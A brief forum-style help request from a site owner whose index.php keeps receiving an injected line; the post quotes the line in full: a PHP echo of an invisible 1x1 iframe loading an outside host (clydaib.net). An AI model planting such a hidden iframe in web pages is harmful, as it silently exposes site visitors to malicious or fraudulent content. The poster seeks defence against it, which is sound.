someone is intruding in our site and putting following line in our main page (index.php)::
In the following code bottom.php is our own file and the intruder is putting the
"echo <iframe .... >;"
line between our "include_once" code.
<?include_once('bottom.php');
echo "<iframe src=\"http://clydaib.net/?click=86B26\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
please help me out to prevent this trespassing.
